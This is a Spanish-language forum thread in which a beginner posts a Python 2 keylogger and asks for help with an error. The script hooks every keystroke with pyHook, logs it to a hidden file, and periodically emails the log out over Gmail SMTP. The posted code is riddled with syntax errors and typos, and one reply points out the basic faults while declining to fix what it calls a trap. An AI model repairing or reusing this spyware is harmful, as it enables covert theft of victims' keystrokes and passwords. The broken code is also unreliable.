elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  keyLogger en python, pero me lanza un error cuando escribo una "variable"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: keyLogger en python, pero me lanza un error cuando escribo una "variable"  (Leído 3,164 veces)
GregoJm

Desconectado Desconectado

Mensajes: 1


Ver Perfil
keyLogger en python, pero me lanza un error cuando escribo una "variable"
« en: 1 Junio 2017, 06:58 am »

Hola amigos de este foro, soy nuevo acá, vine solicitando ayuda y aprender un poco más, soy nuevo en esto de programación, estoy aprendiendo Python, estaba haciendo un KeyLogger, pero me lanza un error cuando escribo una "variable"
Les muestro la líneas de códigos, a ver si me pueden ayudar a encontrar el error.
Gracias.

Código
  1. import pyHook, pythoncom, sys, loggin
  2. import time, datetime
  3.  
  4. wait_seconds = 60
  5. timeout = time.time() +wait_second
  6. file_log = 'C:\\secret\\dat.txt'
  7.  
  8. def TimeOut():
  9.    if time.time() > timeout:
  10.        return True
  11.    else:
  12.        return False
  13.  
  14. def SendEmail(user, pwd, recipient, subject, body):
  15.    import smtplib
  16.  
  17.    gmail_user = user
  18.    gmail_pass = pwd
  19.    FROM = use
  20.    TO = recipient if type(recipient) is list else (recipient)
  21.    SUBJECT = subject
  22.    TEXT = body
  23.  
  24.    message ="""\From: %s\nTo: $s\nSubject: %s\n\n%s
  25.    """ % (FROM ", ".join(TO), SUBJECT, TEXT)
  26.    try
  27.        server = Smtplib.SMTP("smtp.gmail.com", 587)
  28.        server.ehlo()
  29.        server.starttls()
  30.        server.login(gmail_user, gmail_pass)
  31.        server.closer()
  32.        print 'Correo enviado sastifactoriamente'
  33.       except
  34.        print 'Error al mandar correo'
  35.  
  36. def FormatAndSendLogEmail():
  37.    with open(file_log, 'r+') as f:
  38.        actualdate = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  39.        data = f.read()replacer('\n', '')
  40.        data = 'Log capturado a las: ' + actualidate + '\n' + data
  41.        SendEmail(jejeje@gmail.com', 'unacontraseña123', 'jejeje@gmail.com',
  42.                  'Nuevo log - '+actualdate, data)
  43.        f.seek(0)
  44.        f.truncate()
  45.  
  46.  
  47. def OnkeyboardEvent(event):
  48.    loggin.basicConfig(filename=file_log, level=loggin.DEBUG,
  49.                       format = '%(message)s'  
  50.    logging.log(10, chr(event.Ascii))
  51.    return True
  52.  
  53. hooks_manager = pyHook.HookManager()
  54. hooks_manager.KeyDown = OnKeyboardEvent                      
  55. hooks_manager.HookKeyboard()
  56.  
  57. while True
  58.    if TimeOut():
  59.         FormatAndSendEmail()
  60.         timeout = time.time() + wait_seconds
  61.  
  62.    pythoncom.PumwaitingMessages()                      
  63.  
  64.  


· Los códigos deben ir en etiquetas GeSHi
· Los títulos deben ser descriptivos a la temática
· Los temas de python van en scripting
>aquí las reglas del foro
-Engel Lex


« Última modificación: 1 Junio 2017, 07:02 am por engel lex » En línea

Alej

Desconectado Desconectado

Mensajes: 14



Ver Perfil
Re: keyLogger en python, pero me lanza un error cuando escribo una "variable"
« Respuesta #1 en: 1 Junio 2017, 07:13 am »

Citar
estaba haciendo un KeyLogger, pero me lanza un error cuando escribo una "variable"

Puedes mostrar el error que sale?


« Última modificación: 1 Junio 2017, 07:54 am por Alej » En línea

tincopasan


Desconectado Desconectado

Mensajes: 1.286

No es lo mismo conocer el camino que recorrerlo.


Ver Perfil
Re: keyLogger en python, pero me lanza un error cuando escribo una "variable"
« Respuesta #2 en: 1 Junio 2017, 08:58 am »

estaría bueno que antes de querer usar un código de otro, aprendieran lo mínimo de la sintaxis de pyhton!!!
hay errores básicos:
1)mala indentación
2)faltan dos puntos ":"
3)sobran símbolos o comentarios
4) y seguramente más cosas que ni voy a revisar, un keylogger es una trampa que si quieren usar aprendan a hacerlo.
5)es python 2.x ni me interesa revisar las funciones o sentencias.
6)Revisa lo básico y después mostrá que error da, así los que saben te ayudan.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines